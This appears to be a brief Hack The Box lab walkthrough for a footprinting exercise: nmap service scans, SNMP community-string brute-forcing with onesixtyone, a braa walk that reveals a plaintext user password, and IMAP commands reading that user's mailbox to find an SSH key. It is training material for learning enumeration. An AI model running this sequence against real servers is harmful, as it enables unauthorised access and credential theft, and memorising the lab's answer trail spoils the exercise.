MX Management server
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
nmap $HOST -sV -T2 -vv
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
143/tcp open imap syn-ack ttl 63 Dovecot imapd (Ubuntu)
993/tcp open ssl/imap syn-ack ttl 63 Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 syn-ack ttl 63 Dovecot pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SNMP Port is open:
nmap $HOST -p161,162,163 -sU -vv
161/udp open snmp udp-response ttl 63 net-snmp; net-snmp SNMPv3 server
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 5b99e75a10288b6100000000
| snmpEngineBoots: 10
|_ snmpEngineTime: 12m31s
Find a working community string:
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt $HOST
Scanning 1 hosts, 3218 communities
10.129.202.20 [backup] Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
backup is working.
Lets run braa
braa backup@$HOST:.*
...
10.129.202.20:102ms:.80:/opt/tom-recovery.sh
10.129.202.20:41ms:.80:tom NMds732Js2761
...
Then using imap:
1 LIST "" *
* LIST (\\HasNoChildren) "." Notes
* LIST (\\HasNoChildren) "." Meetings
* LIST (\\HasNoChildren \\UnMarked) "." Important
* LIST (\\HasNoChildren) "." INBOX
All folders empty, except INBOX
1 SELECT INBOX
1 FETCH 1 all
* 1 FETCH (FLAGS (\\Seen) INTERNALDATE "10-Nov-2021 01:44:26 +0000" RFC822.SIZE 3661 ENVELOPE ("Wed, 10 Nov 2010 14:21:26 +0200" "KEY" ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NI
L "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "MISSING_MAILBOX" "MISSING_DOMAIN")) ((NIL NIL "tom" "inlanefreight.htb")) NIL NIL NIL NIL))
1 OK Fetch completed (0.058 + 0.000 + 0.057 secs).
We have an id_rsa valid for SSH